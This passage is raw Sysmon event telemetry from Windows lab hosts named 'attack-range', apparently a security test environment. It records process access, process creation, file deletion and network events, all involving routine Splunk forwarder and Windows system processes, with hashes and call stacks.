11:17:20.683{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.683{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-17C0-6216-3507-000000003802}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.683{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.683{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.683{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17C0-6216-3507-000000003802}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.685{C8EA50B7-17C0-6216-3507-000000003802}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.636{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69CDF3FE706FCE1AFFA949D4C658A454,SHA256=47A26C9718BC79FBF74DAFE8AD5017DF645DB0F1B22BDE8F288CA3A2E2786038,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:18.542{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51653-false10.0.1.12-8000- 23542300x8000000000000000221474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:20.059{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A9C709036019559F741E952F5CC9EE0,SHA256=67E2CFCD80890F59EFCA95EB0B292680496BE006C50C75D1933A0F3ED83C9F21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.214{C8EA50B7-17C0-6216-3407-000000003802}64086180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.014{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17C0-6216-3407-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.014{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.014{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.014{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.014{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.014{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-17C0-6216-3407-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.014{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17C0-6216-3407-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.016{C8EA50B7-17C0-6216-3407-000000003802}6408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.655{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F315CDCE77CA41FD0F12D52E814CEE,SHA256=5443940D974678320AD68CC4DA814CA938608FD000C8688DE968E6A5013C58F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:21.075{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A92F864843286EF0A73BFC7AB9D9D266,SHA256=51FAEA58D985A2665F12C51D418081E4D6AE91FF7CF0AD5328D9937106890FCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.367{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17C1-6216-3607-000000003802}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.367{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.367{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.367{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.367{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.367{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-17C1-6216-3607-000000003802}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.367{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17C1-6216-3607-000000003802}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:21.369{C8EA50B7-17C1-6216-3607-000000003802}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:22.664{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7867B75919A79E7B62C343D189CC71AB,SHA256=99D1BD9BC8E98F6393E1FF30B3FD65A896EB6261781695D5E5F3FB60594AE0B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:22.122{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=558731DA0985A795C4FB11282FA5271D,SHA256=D540A5DCDE3586E855C09F6912807FAC118B0CDE636EAE688125E1431F0BA7E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:23.669{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=089D555A3F6305FBFF2284DE84A8C958,SHA256=2FE7A9AF9587A8383F7A91BDACDA70A49297F82F3F67B2C3FBACFBB68C33BD20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:23.325{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 